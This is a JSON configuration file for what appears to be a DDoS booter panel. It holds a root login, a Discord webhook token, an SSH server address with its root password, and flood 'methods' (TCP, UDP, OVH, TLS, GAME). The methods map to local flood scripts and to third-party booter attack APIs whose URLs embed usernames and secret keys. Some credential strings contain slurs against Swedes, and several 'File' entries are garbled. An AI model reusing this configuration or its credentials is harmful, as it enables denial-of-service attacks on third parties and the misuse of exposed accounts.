[
    {
        "user": "root",
        "pass": "Keanoxd1!",
        "webhook": "https://discord.com/api/webhooks/1127361339799633920/oa7gPPAH_3g4UuaO2fVEjWTwQMSiAmchSc_al41F7QQbftv9x4g4nJfm3xQVXL600YfY",
        "Default" : {
            "PPS": "-1",
            "Threads": "8",
            "Packet_Size": "1"
        },
        "Servers": [
            {
                "IP": "146.19.191.70", 
                "Port": 22,
                "Username": "root",
                "Password": "qkK4z1,43#p8U7"
            }
        ],
        "Methods": {
            "TCP": {
                "File": "cd node-tcp-kill; node tcp_kill.js",
                "Args": "big [host]:[port] [time]",
                "API": [
                    "http://185.216.71.125/api/attack?username=Sweden&secret=Swedenisagaycountry1234&host=[host]&port=[port]&time=[time]&method=KILL",
                    "http://192.3.243.131:443/api/attack?username=Flame1&key=Flamehateswedes&host=[host]&port=[port]&time=[time]&method=TCP",
                    "https://wraith.army/api/attack?username=flame&secret=jsfhahfa&host=[host]&port=[port]&time=[time]&method=kill"
                ]
            },
            "SOCKET": {
                "File": "cd node-tcp-kill; node tcp_kill.js",
                "Args": "connect [host]:[port] [time]",
                "API": [
                    "https://wraith.army/api/attack?username=flame&secret=jsfhahfa&host=[host]&port=[port]&time=[time]&method=socket"
                ]
            },
            "ACK": {
                "File": "cd node-tcp-kill; node tcp_kill.js",
                "Args": "connect [host]:[port] [time]",
                "API": [
                    "https://wraith.army/api/attack?username=flame&secret=jsfhahfa&host=[host]&port=[port]&time=[time]&method=xack"
                ]
            },
            "TCPBYPASS": {
                "File": "cd node-tcp-kill; node tcp_kill.js",
                "Args": "connect [host]:[port] [time]",
                "API": [
                    "https://wraith.army/api/attack?username=flame&secret=jsfhahfa&host=[host]&port=[port]&time=[time]&method=tcpbypass"
                ]
            },
            "UDP": {
                "File": "./methods/HEXRAIL",
                "Args": "attack [host] [port] [time]",
                "API": [
                    "http://185.216.71.125/api/attack?username=Sweden&secret=Swedenisagaycountry1234&host=[host]&port=[port]&time=[time]&method=UDPPLAIN",
                    "https://rain-api.xyz/api/start?username=cepto&key=NSDKRnHvioOheIs&host=[host]&port=[port]&time=[time]&method=UDP",
                    "http://192.3.243.131:443/api/attack?username=Flame1&key=Flamehateswedes&host=[host]&port=[port]&time=[time]&method=UDP"
                ]
            },
            "HEX": {
                "File": "./methods/HEXRAIL",
                "Args": "attack [host] [port] [time]",
                "API": [
                    "http://185.216.71.125/api/attack?username=Sweden&secret=Swedenisagaycountry1234&host=[host]&port=[port]&time=[time]&method=STD"
                ]
            },
            "STD": {
                "File": "./methods/HEXRAIL",
                "Args": "attack [host] [port] [time]",
                "API": [
                    "http://185.216.71.125/api/attack?username=Sweden&secret=Swedenisagaycountry1234&host=[host]&port=[port]&time=[time]&method=STD"
                ]
            },
            "GAME": {
                "File": "./methods/GAME-UDP",
                "Args": "[host] [port] [time] [threads]",
                "API": [
                    "http://185.216.71.125/api/attack?username=Sweden&secret=Swedenisagaycountry1234&host=[host]&port=[port]&time=[time]&method=UDPPLAIN",
                    "https://wraith.army/api/attack?username=flame&secret=jsfhahfa&host=[host]&port=[port]&time=[time]&method=game"
                ]
            },
            "PPS": {
                "File": "./methods/GAME-UDP",
                "Args": "[host] [port] [time] [threads]",
                "API": [
                    "https://rain-api.xyz/api/start?username=cepto&key=NSDKRnHvioOheIs&host=[host]&port=[port]&time=[time]&method=PPS",
                    "https://wraith.army/api/attack?username=flame&secret=jsfhahfa&host=[host]&port=[port]&time=[time]&method=game"
                ]
            },
            "OVH": {
                "File": "cd node-tcp-ll; node tcp_kill.js",
                "Args": "big [host]:[port] [time]",
                "API": [
                    "http://185.216.71.125/api/attack?username=Sweden&secret=Swedenisagaycountry1234&host=[host]&port=[port]&time=[time]&method=OVHTCP",
                    "https://rain-api.xyz/api/start?username=cepto&key=NSDKRnHvioOheIs&host=[host]&port=[port]&time=[time]&method=OVH",
                    "http://192.3.243.131:443/api/attack?username=Flame1&key=Flamehateswedes&host=[host]&port=[port]&time=[time]&method=OVH"
                ]
            },
            "HTTPS": {
                "File": "cd node-tcp-ll; node tls.js",
                "Args": "[host] [time] 1024 [threads] GET proxy.txt",
                "API": [
                    "http://192.3.243.131:443/api/attack?username=Flame1&key=Flamehateswedes&host=[host]&port=[port]&time=[time]&method=TLS"
                ]
            },
            "TLS": {
                "File": "cd methods; node tls.js",
                "Args": "[host] [time] 1024 [threads] GET proxy.txt",
                "API": [
                    "http://192.3.243.131:443/api/attack?username=Flame&key=kitten&host=[host]&port=[port]&time=[time]&method=TLS",
                    "http://80.76.51.180:999/api?key=flame31234&host=[host]&port=[port]&time=[time]&method=L7-BYPASS"
                ]
            },
            "HTTP-SPAM": {
                "File": "cd ; de tcp_kill.js",
                "Args": "big [host]:[port] [time]",
                "API": [
                    "http://192.3.243.131:443/api/attack?username=Flame&key=kitten&host=[host]&port=[port]&time=[time]&method=TLS"
                ]
            },
            "HTTP-RATES": {
                "File": "cd ; ne tcp_kill.js",
                "Args": "big [host]:[port] [time]",
                "API": [
                    "http://192.3.243.131:443/api/attack?username=Flame&key=kitten&host=[host]&port=[port]&time=[time]&method=TLS"
                ]
            },
            "TEST": {
                "File": "cd ; ne tcp",
                "Args": "big [host]:[port] [time]",
                "API": [
                    "https://wraith.army/api/attack?username=flame&secret=jsfhahfa&host=[host]&port=[port]&time=[time]&method=udp"
                    
                ]
            }
        }
    }
]